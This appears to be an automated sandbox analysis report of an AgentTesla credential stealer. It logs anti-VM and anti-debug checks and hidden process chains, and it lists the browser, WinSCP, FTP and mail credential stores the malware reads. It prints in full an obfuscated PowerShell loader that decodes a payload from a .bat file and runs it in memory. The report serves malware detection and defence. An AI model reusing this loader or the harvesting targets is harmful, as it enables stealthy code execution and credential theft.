Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97383
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97045
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96389
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95605
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799964
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799610

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVBox
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 20_2_00AE70B0 CheckRemoteDebuggerPresent,

20_2_00AE70B0

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process queried: DebugPort

Enables debug privileges

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' \| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)\| Out-Null"	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat' \| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)\| Out-Null"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe c:\users\user\desktop\87m9y3p4z7.bat.zhe -windowstyle hidden -command "$onnkl = get-content 'c:\users\user\desktop\87m9y3p4z7.bat' \| select-object -last 1; $mdqytced = [system.convert]::frombase64string($onnkl);$ktdhxz = new-object system.io.memorystream( , $mdqytced );$mcldrihy = new-object system.io.memorystream;$plcywucshy = new-object system.io.compression.gzipstream $ktdhxz, ([io.compression.compressionmode]::decompress);$plcywucshy.copyto( $mcldrihy );$plcywucshy.close();$ktdhxz.close();[byte[]] $mdqytced = $mcldrihy.toarray();[array]::reverse($mdqytced); $mxpzv = [system.appdomain]::currentdomain.load($mdqytced); $ylvhvbxsq = $mxpzv.entrypoint; $ylvhvbxsq.declaringtype.invokemember($ylvhvbxsq.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)\| out-null"
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe c:\users\user\appdata\roaming\channeluris.bat.zhe -windowstyle hidden -command "$onnkl = get-content 'c:\users\user\appdata\roaming\channeluris.bat' \| select-object -last 1; $mdqytced = [system.convert]::frombase64string($onnkl);$ktdhxz = new-object system.io.memorystream( , $mdqytced );$mcldrihy = new-object system.io.memorystream;$plcywucshy = new-object system.io.compression.gzipstream $ktdhxz, ([io.compression.compressionmode]::decompress);$plcywucshy.copyto( $mcldrihy );$plcywucshy.close();$ktdhxz.close();[byte[]] $mdqytced = $mcldrihy.toarray();[array]::reverse($mdqytced); $mxpzv = [system.appdomain]::currentdomain.load($mdqytced); $ylvhvbxsq = $mxpzv.entrypoint; $ylvhvbxsq.declaringtype.invokemember($ylvhvbxsq.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)\| out-null"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe c:\users\user\desktop\87m9y3p4z7.bat.zhe -windowstyle hidden -command "$onnkl = get-content 'c:\users\user\desktop\87m9y3p4z7.bat' \| select-object -last 1; $mdqytced = [system.convert]::frombase64string($onnkl);$ktdhxz = new-object system.io.memorystream( , $mdqytced );$mcldrihy = new-object system.io.memorystream;$plcywucshy = new-object system.io.compression.gzipstream $ktdhxz, ([io.compression.compressionmode]::decompress);$plcywucshy.copyto( $mcldrihy );$plcywucshy.close();$ktdhxz.close();[byte[]] $mdqytced = $mcldrihy.toarray();[array]::reverse($mdqytced); $mxpzv = [system.appdomain]::currentdomain.load($mdqytced); $ylvhvbxsq = $mxpzv.entrypoint; $ylvhvbxsq.declaringtype.invokemember($ylvhvbxsq.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)\| out-null"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe c:\users\user\appdata\roaming\channeluris.bat.zhe -windowstyle hidden -command "$onnkl = get-content 'c:\users\user\appdata\roaming\channeluris.bat' \| select-object -last 1; $mdqytced = [system.convert]::frombase64string($onnkl);$ktdhxz = new-object system.io.memorystream( , $mdqytced );$mcldrihy = new-object system.io.memorystream;$plcywucshy = new-object system.io.compression.gzipstream $ktdhxz, ([io.compression.compressionmode]::decompress);$plcywucshy.copyto( $mcldrihy );$plcywucshy.close();$ktdhxz.close();[byte[]] $mdqytced = $mcldrihy.toarray();[array]::reverse($mdqytced); $mxpzv = [system.appdomain]::currentdomain.load($mdqytced); $ylvhvbxsq = $mxpzv.entrypoint; $ylvhvbxsq.declaringtype.invokemember($ylvhvbxsq.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)\| out-null"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.000000000276E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.0000000002872000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.000000000284F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5092, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
